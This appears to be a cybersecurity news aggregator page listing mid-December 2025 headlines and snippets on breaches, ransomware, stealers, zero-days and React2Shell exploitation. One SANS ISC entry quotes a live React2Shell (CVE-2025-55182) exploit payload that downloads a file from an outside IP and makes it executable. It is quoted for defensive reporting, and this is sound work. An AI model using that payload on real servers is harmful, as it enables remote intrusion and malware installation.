no alarms and no surprises please..
-
Askul confirms theft of 740k customer records in ransomware attack
Askul confirms theft of 740k customer records in ransomware attack Japanese e-commerce giant Askul Corporation has confirmed that RansomHouse hackers stole around 740,000 customer records in the ransomware attack it suffered in October. […] Bill Toulas Go to bleepingcomputer
-
New SantaStealer malware steals data from browsers, crypto wallets
New SantaStealer malware steals data from browsers, crypto wallets A new malware-as-a-service (MaaS) information stealer named SantaStealer is being advertised on Telegram and hacker forums as operating in memory to avoid file-based detection. […] Bill Toulas Go to bleepingcomputer
-
PornHub extorted after hackers steal Premium member activity data
PornHub extorted after hackers steal Premium member activity data Adult video platform PornHub is being extorted by the ShinyHunters extortion gang after the search and watch history of its Premium members was reportedly stolen in a recent Mixpanel data breach. […] Lawrence Abrams Go to bleepingcomputer
-
SoundCloud Confirms Data Breach – Hackers Exfiltrated User Account Data
SoundCloud Confirms Data Breach – Hackers Exfiltrated User Account Data SoundCloud has confirmed a security incident involving unauthorized access to user data, revealing that hackers exfiltrated email addresses and public profile information from approximately 20% of its user base. The company disclosed the breach in a transparency blog post on December 15, 2025, emphasizing that…
-
New GhostPairing Attack Let Attackers Gain Full Access in WhatsApp with Phone Number
New GhostPairing Attack Let Attackers Gain Full Access in WhatsApp with Phone Number A newly discovered account takeover campaign targeting WhatsApp users demonstrates how attackers can compromise messaging accounts without stealing passwords or exploiting technical vulnerabilities. The threat, identified as the GhostPairing Attack, uses social engineering and WhatsApp’s legitimate device linking feature to grant attackers…
-
Critical FortiGate Devices SSO Vulnerabilities Actively Exploited in the Wild
Critical FortiGate Devices SSO Vulnerabilities Actively Exploited in the Wild An active intrusion is targeting critical authentication bypass vulnerabilities in Fortinet’s FortiGate appliances and related products. Threat actors are exploiting CVE-2025-59718 and CVE-2025-59719 to perform unauthenticated single sign-on (SSO) logins via malicious SAML messages, granting attackers administrative access. Fortinet disclosed the flaws in a PSIRT…
-
PornHub Breached by ShinyHunters Group and Premium Members’ Data Stolen
PornHub Breached by ShinyHunters Group and Premium Members’ Data Stolen The notorious hacking collective ShinyHunters has claimed responsibility for a major data breach at Mixpanel, a popular analytics provider, exposing limited user data tied to Pornhub Premium accounts. The incident, which has only affected select Premium subscribers, has raised concerns within the cybersecurity community. Although…
-
ZnDoor Malware Exploiting React2Shell Vulnerability to Compromise Network Devices
ZnDoor Malware Exploiting React2Shell Vulnerability to Compromise Network Devices Since December 2025, a concerning trend has emerged across Japanese organizations as attackers exploit a critical vulnerability in React/Next.js applications. The vulnerability, tracked as CVE-2025-55182 and known as React2Shell, represents a remote code execution flaw attracting widespread exploitation. While initial attacks primarily deployed cryptocurrency miners, security…
-
Google to Shut Down Dark Web Monitoring Tool in February 2026
Google to Shut Down Dark Web Monitoring Tool in February 2026 Google has announced that it’s discontinuing its dark web report tool in February 2026, less than two years after it was launched as a way for users to monitor if their personal information is found on the dark web. To that end, scans for…
-
Featured Chrome Browser Extension Caught Intercepting Millions of Users’ AI Chats
Featured Chrome Browser Extension Caught Intercepting Millions of Users’ AI Chats A Google Chrome extension with a “Featured” badge and six million users has been observed silently gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. The…
-
FreePBX Patches Critical SQLi, File-Upload, and AUTHTYPE Bypass Flaws Enabling RCE
FreePBX Patches Critical SQLi, File-Upload, and AUTHTYPE Bypass Flaws Enabling RCE Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations. The shortcomings, discovered by Horizon3.ai and reported to the project maintainers on September 15, 2025,…
-
⚡ Weekly Recap: Apple 0-Days, WinRAR Exploit, LastPass Fines, .NET RCE, OAuth Scams & More
⚡ Weekly Recap: Apple 0-Days, WinRAR Exploit, LastPass Fines, .NET RCE, OAuth Scams & More If you use a smartphone, browse the web, or unzip files on your computer, you are in the crosshairs this week. Hackers are currently exploiting critical flaws in the daily software we all rely on—and in some cases, they started…
-
A Browser Extension Risk Guide After the ShadyPanda Campaign
A Browser Extension Risk Guide After the ShadyPanda Campaign In early December 2025, security researchers exposed a cybercrime campaign that had quietly hijacked popular Chrome and Edge browser extensions on a massive scale. A threat group dubbed ShadyPanda spent seven years playing the long game, publishing or acquiring harmless extensions, letting them run clean for…
-
Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations
Game of clones: Sophos and the MITRE ATT&CK Enterprise 2025 Evaluations Winter is coming – so it must be time for Sophos X-Ops’ report on this year’s MITRE ATT&CK Enterprise Evaluations Matt Wixey Go to sophos
-
Against the Federal Moratorium on State-Level Regulation of AI
Against the Federal Moratorium on State-Level Regulation of AI Cast your mind back to May of this year: Congress was in the throes of debate over the massive budget bill. Amidst the many seismic provisions, Senator Ted Cruz dropped a ticking time bomb of tech policy: a ten-year moratorium on the ability of states to…
-
ISC Stormcast For Tuesday, December 16th, 2025 https://isc.sans.edu/podcastdetail/9740, (Tue, Dec 16th)
ISC Stormcast For Tuesday, December 16th, 2025 https://isc.sans.edu/podcastdetail/9740, (Tue, Dec 16th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
More React2Shell Exploits CVE-2025-55182, (Mon, Dec 15th)
More React2Shell Exploits CVE-2025-55182, (Mon, Dec 15th) Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload: ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”0″ {“then”:”$1:__proto__:then”,”status”:”resolved_model”,”reason”:-1,”value”:”{“then”:”$B1337″}”,”_response”:{“_prefix”:”process.mainModule.require(‘http’).get(‘http://51.81.104.115/nuts/poop’,r=>r.pipe(process.mainModule.require(‘fs’).createWriteStream(‘/dev/shm/lrt’).on(‘finish’,()=>process.mainModule.require(‘fs’).chmodSync(‘/dev/shm/lrt’,0o755))));”,”_formData”:{“get”:”$1:constructor:constructor”}}} ——WebKitFormBoundaryxtherespoopalloverme Content-Disposition: form-data; name=”1″ “$@0” ——WebKitFormBoundaryxtherespoopalloverme ——WebKitFormBoundaryxtherespoopalloverme– To…
-
How Cyber Insurance MGAs Shape Policies for Evolving Cyber Risks
How Cyber Insurance MGAs Shape Policies for Evolving Cyber Risks Managing general agents help insurers navigate sectors where they lack expertise. A cybersecurity policy written by an MGA is more likely to reflect an understanding of the risks CISOs deal with. Ericka Chickowski, Contributing Writer Go to gbhackers.com
-
Apple Patches More Zero-Days Used in ‘Sophisticated’ Attack
Apple Patches More Zero-Days Used in ‘Sophisticated’ Attack Two Apple zero-day vulnerabilities discovered this month have overlap with another mysterious zero-day flaw Google patched last week. Alexander Culafi Go to gbhackers.com
-
Think Like an Attacker: Cybersecurity Tips From Cato Networks’ CISO
Think Like an Attacker: Cybersecurity Tips From Cato Networks’ CISO Etay Mayor, a cybersecurity strategist and professor, shares his journey, insights, and advice on breaking into the diverse and ever-evolving field of cybersecurity. Kristina Beek Go to gbhackers.com
-
Flaw in Hacktivist Ransomware Lets Victims Decrypt Own Files
Flaw in Hacktivist Ransomware Lets Victims Decrypt Own Files A new version of VolkLocker, wielded by the pro-Russia RaaS group CyberVolk, has some key enhancements but one fatal flaw. Elizabeth Montalbano, Contributing Writer Go to gbhackers.com
-
Storm-0249: EDR Process Sideloading to Conceal Malicious Activity
Storm-0249: EDR Process Sideloading to Conceal Malicious Activity Initial access broker Storm-0249 has evolved from a mass phishing operation into a sophisticated threat actor weaponizing legitimate Endpoint Detection and Response (EDR) processes… Go to gbhackers.com
-
New VolkLocker Ransomware Variant Targets Both Linux and Windows Systems
New VolkLocker Ransomware Variant Targets Both Linux and Windows Systems CyberVolk, a pro-Russia hacktivist group first documented in late 2024, has resurfaced with a sophisticated ransomware-as-a-service (RaaS) offering called VolkLocker after months of dormancy… Go to gbhackers.com
-
NVIDIA Merlin Vulnerabilities Allows Malicious Code Execution and DoS Attacks
NVIDIA Merlin Vulnerabilities Allows Malicious Code Execution and DoS Attacks NVIDIA has released urgent security patches for its Merlin machine learning framework after discovering two high-severity deserialization vulnerabilities that could enable attackers to execute… Go to gbhackers.com
-
Critical Plesk Vulnerability Allows Users to Gain Root-Level Access
Critical Plesk Vulnerability Allows Users to Gain Root-Level Access A critical security vulnerability has been discovered in Plesk, a widely used web hosting control panel, that enables unauthorised users to escalate privileges and… Go to gbhackers.com
-
Critical pgAdmin Flaw Allows Attackers to Execute Shell Commands on Host
Critical pgAdmin Flaw Allows Attackers to Execute Shell Commands on Host A new critical vulnerability in pgAdmin 4 allows remote attackers to bypass security filters and execute arbitrary shell commands on the host server. The… Go to gbhackers.com
-
Microsoft: December security updates cause Message Queuing failures
Microsoft: December security updates cause Message Queuing failures Microsoft has confirmed that the December 2025 security updates are breaking Message Queuing (MSMQ) functionality, affecting enterprise applications and Internet Information Services (IIS) websites. […] Sergiu Gatlan Go to bleepingcomputer
-
Beware: PayPal subscriptions abused to send fake purchase emails
Beware: PayPal subscriptions abused to send fake purchase emails An email scam is abusing abusing PayPal’s “Subscriptions” billing feature to send legitimate PayPal emails that contain fake purchase notifications embedded in the Customer service URL field. […] Lawrence Abrams Go to bleepingcomputer
-
CyberVolk’s ransomware debut stumbles on cryptography weakness
CyberVolk’s ransomware debut stumbles on cryptography weakness The pro-Russia hacktivist group CyberVolk launched a ransomware-as-a-service (RaaS) called VolkLocker that suffered from serious implementation flaws, allowing victims to potentially decrypt files for free. […] Bill Toulas Go to bleepingcomputer
-
Windows Remote Access Connection Manager Vulnerability Enables Arbitrary Code Execution
Windows Remote Access Connection Manager Vulnerability Enables Arbitrary Code Execution A critical security issue involving the Windows Remote Access Connection Manager (RasMan) that allows local attackers to execute arbitrary code with System privileges. While investigating CVE-2025-59230, the vulnerability that Microsoft addressed in the October 2025 security updates. 0patch security analysts discovered a complex exploit chain that…
-
CISA Adds Sierra Router Vulnerability to KEV Catalogue Following Active Exploitation
CISA Adds Sierra Router Vulnerability to KEV Catalogue Following Active Exploitation A critical vulnerability affecting Sierra Wireless routers has been added to its Known Exploited Vulnerabilities (KEV) catalog. This decision comes after evidence emerged that the flaw is being actively exploited in the wild. Posing significant risks to organizations that still utilize these legacy devices.…
-
CISA Releases Guidance for Managing UEFI Secure Boot on Enterprise Devices
CISA Releases Guidance for Managing UEFI Secure Boot on Enterprise Devices The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the National Security Agency (NSA), has issued new guidance urging enterprises to verify and manage UEFI Secure Boot configurations to counter bootkit threats. Released in December 2025 as a Cybersecurity Information Sheet (CSI),…
-
CISA Warns of Windows Cloud Files Mini Filter 0-Day Vulnerability Exploited in Attacks
CISA Warns of Windows Cloud Files Mini Filter 0-Day Vulnerability Exploited in Attacks A critical alert regarding an active zero-day vulnerability affecting the Microsoft Windows Cloud Files Mini Filter Driver. The vulnerability poses a significant risk to organizations running affected Windows systems and requires immediate remediation efforts. CISA reports that the vulnerability, tracked as CVE-2025-62221,…
-
TR-25-0456 (Google Android Güvenlik Bildirimi)
TR-25-0456 (Google Android Güvenlik Bildirimi) Go to usom.gov
-
TR-25-0455 (Apache Güvenlik Bildirimi)
TR-25-0455 (Apache Güvenlik Bildirimi) Go to usom.gov
-
TR-25-0454 (Dormakaba Güvenlik Bildirimi)
TR-25-0454 (Dormakaba Güvenlik Bildirimi) Go to usom.gov
-
TR-25-0453 (Typora Güvenlik Bildirimi)
TR-25-0453 (Typora Güvenlik Bildirimi) Go to usom.gov
-
TR-25-0452 (Tenda Güvenlik Zafiyeti)
TR-25-0452 (Tenda Güvenlik Zafiyeti) Go to usom.gov
-
VolkLocker Ransomware Exposed by Hard-Coded Master Key Allowing Free Decryption
VolkLocker Ransomware Exposed by Hard-Coded Master Key Allowing Free Decryption The pro-Russian hacktivist group known as CyberVolk (aka GLORIAMIST) has resurfaced with a new ransomware-as-a-service (RaaS) offering called VolkLocker that suffers from implementation lapses in test artifacts, allowing users to decrypt files without paying an extortion fee. According to SentinelOne, VolkLocker (aka CyberVolk 2.x) emerged…
-
Upcoming Speaking Engagements
Upcoming Speaking Engagements This is a current list of where and when I am scheduled to speak: I’m speaking and signing books at the Chicago Public Library in Chicago, Illinois, USA, at 6:00 PM CT on February 5, 2026. Details to come. I’m speaking at Capricon 44 in Chicago, Illinois, USA. The convention runs February…
-
ISC Stormcast For Monday, December 15th, 2025 https://isc.sans.edu/podcastdetail/9738, (Mon, Dec 15th)
ISC Stormcast For Monday, December 15th, 2025 https://isc.sans.edu/podcastdetail/9738, (Mon, Dec 15th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Wireshark 4.6.2 Released, (Sun, Dec 14th)
Wireshark 4.6.2 Released, (Sun, Dec 14th) Wireshark release 4.6.2 fixes 2 vulnerabilities and 5 bugs. The Windows installers now ship with the Visual C++ Redistributable version 14.44.35112. This required a reboot of my laptop. Didier Stevens Senior handler blog.DidierStevens.com (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Researchers and Developers Targeted in AI-Driven GitHub Supply Chain Attack
Researchers and Developers Targeted in AI-Driven GitHub Supply Chain Attack A sophisticated AI-generated supply chain attack is targeting researchers, developers, and security professionals through compromised GitHub repositories, according to findings from Morphisec Threat Labs…. Go to gbhackers.com
-
Empire 6.3.0 Released as Updated Post-Exploitation Framework for Red Teams
Empire 6.3.0 Released as Updated Post-Exploitation Framework for Red Teams Researcher has officially released Empire 6.3.0, a significant update to the widely used post-exploitation and adversary emulation framework designed for Red Teams and Penetration Testers. This latest… Go to gbhackers.com
-
Apple Confirms Zero-Day Exploitation in Targeted Attacks on iPhone Users
Apple Confirms Zero-Day Exploitation in Targeted Attacks on iPhone Users Apple has issued critical security patches addressing two actively exploited zero-day vulnerabilities affecting iPhone and iPad devices. The tech giant confirmed that both flaws… Go to gbhackers.com
-
Kali Linux 2025.4 Released Featuring 3 New Hacking Tools and Wifipumpkin3
Kali Linux 2025.4 Released Featuring 3 New Hacking Tools and Wifipumpkin3 The release of Kali Linux 2025.4 marks a significant milestone for the ethical hacking distribution, bringing major architectural changes and a suite of fresh tools. This… Go to gbhackers.com
-
Hackers Launch Rust-Based Luca Stealer Targeting Linux and Windows
Hackers Launch Rust-Based Luca Stealer Targeting Linux and Windows Cybercriminals are increasingly abandoning traditional programming languages like C and C++ in favor of modern alternatives such as Rust, Golang, and Nim. This strategic… Go to gbhackers.com
-
Google Warns Multiple Hacker Groups Are Exploiting React2Shell to Spread Malware
Google Warns Multiple Hacker Groups Are Exploiting React2Shell to Spread Malware Google Threat Intelligence Group (GTIG) has issued a warning regarding the widespread exploitation of a critical security flaw in React Server Components. Known as React2Shell (CVE-2025-55182), this vulnerability allows attackers to take control of servers remotely without needing a password. Since the vulnerability was disclosed…
-
Empire 6.3.0 Launches With New Features for Red Teams and Penetration Testers
Empire 6.3.0 Launches With New Features for Red Teams and Penetration Testers BC Security has announced the release of Empire 6.3.0, the latest iteration of the widely used post-exploitation and adversary emulation framework. This update reinforces Empire’s position as a premier tool for Red Teams and penetration testers, offering a flexible, modular server architecture written in…
-
CISA Warns of Google Chromium 0-Day Vulnerability Exploited in Attacks
CISA Warns of Google Chromium 0-Day Vulnerability Exploited in Attacks The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical zero-day vulnerability in Google Chromium’s ANGLE graphics engine to its Known Exploited Vulnerabilities (KEV) catalog. Tracked as CVE-2025-14174, the flaw allows remote attackers to trigger out-of-bounds memory access via a malicious HTML page,…
-
Black Hat Europe 2025: Was that device designed to be on the internet at all?
Black Hat Europe 2025: Was that device designed to be on the internet at all? Behind the polished exterior of many modern buildings sit outdated systems with vulnerabilities waiting to be found Go to eset
-
CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks
CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file…
-
ClickFix Attacks Still Using the Finger, (Sat, Dec 13th)
ClickFix Attacks Still Using the Finger, (Sat, Dec 13th) Introduction Since as early as November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer posted a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day. I often investigate two…
-
Gartner tells businesses to block AI browsers now
Gartner tells businesses to block AI browsers now Analyst firm Gartner has issued a blunt warning to organizations: Agentic AI browsers introduce serious new security risks and should be blocked “for the foreseeable future.” Read more in my article on the Fortra blog. Graham Cluley Go to grahamcluley
-
Hackers Target Windows Systems Using Phantom Stealer Hidden in ISO Files
Hackers Target Windows Systems Using Phantom Stealer Hidden in ISO Files Seqrite Labs has uncovered an active Russian phishing campaign that delivers Phantom information-stealing malware through malicious ISO files embedded in fake payment confirmation emails…. Go to gbhackers.com
-
New JSCEAL Infostealer Malware Targets Windows Systems to Steal Login Credentials
New JSCEAL Infostealer Malware Targets Windows Systems to Steal Login Credentials A sophisticated information-stealing tool known as JSCEAL has evolved significantly in recent months, deploying advanced anti-analysis techniques and hardened command-and-control infrastructure to target users… Go to gbhackers.com
-
MITRE Unveils 2025’s Top 25 Most Dangerous Software Weaknesses
MITRE Unveils 2025’s Top 25 Most Dangerous Software Weaknesses MITRE has released its annual Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list for 2025, identifying the most critical vulnerabilities affecting software development… Go to gbhackers.com
-
Research Findings on the Fate of Data Stolen in Phishing Attacks
Research Findings on the Fate of Data Stolen in Phishing Attacks New research from Kaspersky has mapped the complete lifecycle of data stolen during phishing attacks, revealing a sophisticated “shadow market conveyor belt” where victim… Go to gbhackers.com
-
CISA Issues New Guidance for Securing UEFI Secure Boot on Enterprise Devices
CISA Issues New Guidance for Securing UEFI Secure Boot on Enterprise Devices The Cybersecurity and Infrastructure Security Agency has released critical guidance on managing UEFI Secure Boot configurations across enterprise systems. The comprehensive advisory addresses growing… Go to gbhackers.com
-
Apple fixes two zero-day flaws exploited in ‘sophisticated’ attacks
Apple fixes two zero-day flaws exploited in ‘sophisticated’ attacks Apple has released emergency updates to patch two zero-day vulnerabilities that were exploited in an “extremely sophisticated attack” targeting specific individuals. […] Lawrence Abrams Go to bleepingcomputer
-
Coupang data breach traced to ex-employee who retained system access
Coupang data breach traced to ex-employee who retained system access A data breach at Coupang that exposed the information of 33.7 million customers has been tied to a former employee who retained access to internal systems after leaving the company. […] Bill Toulas Go to bleepingcomputer
-
Fake ‘One Battle After Another’ torrent hides malware in subtitles
Fake ‘One Battle After Another’ torrent hides malware in subtitles A fake torrent for Leonardo DiCaprio’s ‘One Battle After Another’ hides malicious PowerShell malware loaders inside subtitle files that ultimately infect devices with the Agent Tesla RAT malware. […] Bill Toulas Go to bleepingcomputer
-
Kali Linux 2025.4 released with 3 new tools, desktop updates
Kali Linux 2025.4 released with 3 new tools, desktop updates Kali Linux has released version 2025.4, its final update of the year, introducing three new hacking tools, desktop environment improvements, the preview of Wifipumpkin3 in NetHunter, and enhanced Wayland support. […] Lawrence Abrams Go to bleepingcomputer
-
Shadow spreadsheets: The security gap your tools can’t see
Shadow spreadsheets: The security gap your tools can’t see When official systems can’t support everyday workflows, employees turn to spreadsheets — creating “shadow spreadsheets” that circulate unchecked. Grist shows how these spreadsheets expose sensitive data, create version sprawl, and remove the audit trails security teams depend on. […] Sponsored by Grist Go to bleepingcomputer
-
Rust-Based Luca Stealer Spreads Across Linux and Windows Systems
Rust-Based Luca Stealer Spreads Across Linux and Windows Systems Threat actors are increasingly abandoning traditional languages like C and C++ in favor of modern alternatives such as Golang, Rust, and Nim. This strategic shift enables developers to compile malicious code for both Linux and Windows with minimal modifications. Among the emerging threats in this landscape…
-
New Phantom Stealer Campaign Hits Windows Machines Through ISO Mounting
New Phantom Stealer Campaign Hits Windows Machines Through ISO Mounting Researchers have uncovered a sophisticated phishing campaign originating in Russia that deploys the Phantom information-stealing malware via malicious ISO files. The attack, dubbed “Operation MoneyMount-ISO,” targets finance and accounting departments explicitly using fake payment confirmation emails to trick victims into executing the payload. The campaign…
-
Apple 0-Day Vulnerabilities Exploited in Sophisticated Attacks Targeting iPhone Users
Apple 0-Day Vulnerabilities Exploited in Sophisticated Attacks Targeting iPhone Users Apple patches two WebKit zero-day flaws actively exploited in sophisticated attacks targeting specific iPhone users running iOS versions prior to 26. The iOS 26.2 and iPadOS 26.2 updates, released December 12, 2025, address CVE-2025-43529 and CVE-2025-14174 in WebKit. CVE-2025-43529 involves a use-after-free vulnerability enabling arbitrary…
-
Kali Linux 2025.4 Released With 3 New Hacking Tools and Wifipumpkin3
Kali Linux 2025.4 Released With 3 New Hacking Tools and Wifipumpkin3 Kali Linux 2025.4, released with substantial desktop environment improvements, full Wayland support across virtual machines, and three powerful new hacking tools, including the much-anticipated Wifipumpkin3. Released on December 12, 2025, this update focuses on modernizing the user experience while maintaining Kali’s position as the…
-
Critical React2Shell Vulnerability (CVE-2025-55182) Analysis: Surge in Attacks Targeting RSC-Enabled Services Worldwide
Critical React2Shell Vulnerability (CVE-2025-55182) Analysis: Surge in Attacks Targeting RSC-Enabled Services Worldwide Torrance, United States / California, December 12th, 2025, CyberNewsWire In December 2025, CVE-2025-55182 (React2Shell), a vulnerability in React Server Components (RSC) that enables remote code execution (RCE), was publicly disclosed. Shortly after publication, multiple security vendors reported scanning activity and suspected exploitation attempts,…
-
Black Hat Europe 2025: Reputation matters – even in the ransomware economy
Black Hat Europe 2025: Reputation matters – even in the ransomware economy Being seen as reliable is good for ‘business’ and ransomware groups care about ‘brand reputation’ just as much as their victims Go to eset
-
Locks, SOCs and a cat in a box: What Schrödinger can teach us about cybersecurity
Locks, SOCs and a cat in a box: What Schrödinger can teach us about cybersecurity If you don’t look inside your environment, you can’t know its true state – and attackers count on that Go to eset
-
TR-25-0450 (Nebim Neyir Bilgisayar – Nebim V3 ERP Güvenlik Bildirimi)
TR-25-0450 (Nebim Neyir Bilgisayar – Nebim V3 ERP Güvenlik Bildirimi) Go to usom.gov
-
Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild
Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched…
-
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. “These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible…
-
New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale
New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale. BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser (MitB) attacks…
-
Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work
Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work The browser has become the main interface to GenAI for most enterprises: from web-based LLMs and copilots, to GenAI‑powered extensions and agentic browsers like ChatGPT Atlas. Employees are leveraging the power of GenAI to draft emails, summarize documents, work on code, and…
-
New React RSC Vulnerabilities Enable DoS and Source Code Exposure
New React RSC Vulnerabilities Enable DoS and Source Code Exposure The React team has released fixes for two new types of flaws in React Server Components (RSC) that, if successfully exploited, could result in denial-of-service (DoS) or source code exposure. The team said the issues were found by the security community while attempting to exploit…
-
Friday Squid Blogging: Giant Squid Eating a Diamondback Squid
Friday Squid Blogging: Giant Squid Eating a Diamondback Squid I have no context for this video—it’s from Reddit—but one of the commenters adds some context: Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting. With so many people carrying around cameras, we’re getting more videos of giant squid at the…
-
Building Trustworthy AI Agents
Building Trustworthy AI Agents The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that…
-
Abusing DLLs EntryPoint for the Fun, (Fri, Dec 12th)
Abusing DLLs EntryPoint for the Fun, (Fri, Dec 12th) In the Microsoft Windows ecosystem, DLLs (Dynamic Load Libraries) are PE files like regular programs. One of the main differences is that they export functions that can be called by programs that load them. By example, to call RegOpenKeyExA(), the program must first load the ADVAPI32.dll.…
-
Processing 630 Million More Pwned Passwords, Courtesy of the FBI
Processing 630 Million More Pwned Passwords, Courtesy of the FBI The sheer scope of cybercrime can be hard to fathom, even when you live and breathe it every day. It’s not just the volume of data, but also the extent to which it replicates across criminal actors seeking to abuse it for their own gain,…
-
The CISO-COO Partnership: Protecting Operational Excellence
The CISO-COO Partnership: Protecting Operational Excellence Digital transformation has made cybersecurity preparation part of operational resilience for most organizations. This calls for a new relationship between CISO and COO. George V. Hulme, Contributing Writer Go to gbhackers.com
-
React2Shell Exploits Flood the Internet as Attacks Continue
React2Shell Exploits Flood the Internet as Attacks Continue As exploitation activity against CVE-2025-55182, researchers are finding some proof-of-concept exploits contain bypasses for Web application firewall (WAF) rules. Rob Wright Go to gbhackers.com
-
Vibe Coding: Innovation Demands Vigilance
Vibe Coding: Innovation Demands Vigilance Unmanaged coding is indeed an alluring idea, but can introduce a host of significant cybersecurity dangers, Constantine warns. Chrissa Constantine Go to gbhackers.com
-
Microsoft Will Bundle Security Copilot with M365 Enterprise Licenses
Microsoft Will Bundle Security Copilot with M365 Enterprise Licenses The move aims to expand the use of Security Copilot and comes with the launch of 12 new agents from Microsoft at the company’s Ignite conference last week. Jeffrey Schwartz Go to gbhackers.com
-
Supply Chain Attacks Targeting GitHub Actions Increased in 2025
Supply Chain Attacks Targeting GitHub Actions Increased in 2025 At this week’s Black Hat Europe conference, two researchers urged developers to adopt a shared responsibility model for open source software and not leave it all up to GitHub to handle. Jeffrey Schwartz Go to gbhackers.com
-
Are Trade Concerns Trumping US Cybersecurity?
Are Trade Concerns Trumping US Cybersecurity? The Trump administration appears to have dropped sanctions against Chinese actors for the Salt Typhoon attacks on US telecoms; but focusing on diplomacy alone misses the full picture, experts say. Robert Lemos, Contributing Writer Go to gbhackers.com
-
CISA orders feds to patch actively exploited Geoserver flaw
CISA orders feds to patch actively exploited Geoserver flaw CISA has ordered U.S. federal agencies to patch a critical GeoServer vulnerability now actively exploited in XML External Entity (XXE) injection attacks. […] Sergiu Gatlan Go to bleepingcomputer
-
MITRE shares 2025’s top 25 most dangerous software weaknesses
MITRE shares 2025’s top 25 most dangerous software weaknesses MITRE has shared this year’s top 25 list of the most dangerous software weaknesses behind over 39,000 security vulnerabilities disclosed between June 2024 and June 2025. […] Sergiu Gatlan Go to bleepingcomputer
-
MKVCinemas streaming piracy service with 142M visits shuts down
MKVCinemas streaming piracy service with 142M visits shuts down An anti-piracy coalition has dismantled one of India’s most popular streaming piracy services, which has provided free access to movies and TV shows to millions over the past two years. […] Sergiu Gatlan Go to bleepingcomputer
-
Brave browser starts testing agentic AI mode for automated tasks
Brave browser starts testing agentic AI mode for automated tasks Brave has introduced a new AI browsing feature that leverages Leo, its privacy-respecting AI assistant, to perform automated tasks for the user. […] Bill Toulas Go to bleepingcomputer
-
Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks Hackers are exploiting a new, undocumented vulnerability in the implementation of the cryptographic algorithm present in Gladinet’s CentreStack and Triofox products for secure remote file access and sharing. […] Bill Toulas Go to bleepingcomputer
-
Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware
Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware A Hamas‑affiliated threat group known as Ashen Lepus, also tracked as WIRTE, has launched a new espionage campaign against governmental and diplomatic entities across the Middle East. The group uses realistic Arabic‑language diplomatic lures that reference regional politics and security talks to trick…
-
Apache Struts 2 DoS Vulnerability Let Attackers Crash Server
Apache Struts 2 DoS Vulnerability Let Attackers Crash Server A critical denial-of-service vulnerability has been discovered in Apache Struts 2, affecting multiple versions of the popular web application framework. The vulnerability, identified as CVE-2025-64775, exploits a file leak in multipart request processing that can cause disk exhaustion and server crashes. Organizations running affected versions should…
-
Windows Remote Access Connection Manager Vulnerabilities Let Attackers Escalate Privileges
Windows Remote Access Connection Manager Vulnerabilities Let Attackers Escalate Privileges Two critical privilege escalation flaws were disclosed in the Windows Remote Access Connection Manager on December 9, 2025. The vulnerabilities, tracked as CVE-2025-62472 and CVE-2025-62474, allow authorized attackers with low-level privileges to gain SYSTEM-level access on affected systems. CVE-2025-62472 stems from the use of uninitialized…
-
CISA Warns of OSGeo GeoServer 0-Day Vulnerability Exploited in Attacks
CISA Warns of OSGeo GeoServer 0-Day Vulnerability Exploited in Attacks An urgent warning about a critical security flaw in OSGeo GeoServer, a widely used open-source geographic data-sharing server. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, indicating that threat actors are actively leveraging this zero-day flaw in attacks targeting both public…
-
New Vulnerabilities in React Server Components Allow DoS Attacks and Source Code Leaks
